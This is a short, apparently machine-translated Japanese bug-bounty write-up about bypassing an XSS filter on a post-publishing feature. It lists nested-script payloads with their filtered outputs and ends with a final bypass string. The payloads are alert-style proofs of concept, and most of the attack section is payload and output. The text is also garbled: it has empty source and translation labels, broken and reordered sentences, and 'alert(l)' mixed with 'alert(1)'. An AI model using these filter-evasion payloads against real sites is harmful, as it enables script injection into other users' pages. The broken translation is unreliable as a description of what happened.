ソース:
訳:
HackerOneでいくつかの基本的な脆弱性を見つけようとし。
投稿を書いてインターネット上に公開できる機能がありました。
バグを探していました そこで私はクロスサイトスクリプティングの が、アプリケーションはそれを保護するのに少し十分に強力でした(完全ではありません:p)。
「><svg/onload=confirm(1);>」 が、ほとんど失敗しました。
その後、アプリケーションが onerror 、 onload 、基本的にはイベント ハンドラーなどの「on」単語を含むすべてのペイロードを削除していることに気づき。
次に、 script のペイロードと出力を試し。
これを回避する方法を考え。
私が使用したペイロードの一部と取得した出力は次のとおりで。
input : <<script>alert(l);
output: <>alert(l);
input: <<scr<script>alert(1);
output: alert(1);
input: <<scr<script>ipt>alert(1);
output: ipt>alert(1);
input: <<scrip<script>t>alert(1);
output: t>alert(1);
最後の攻撃は、、、
<<scrip<scriptT>alert(1);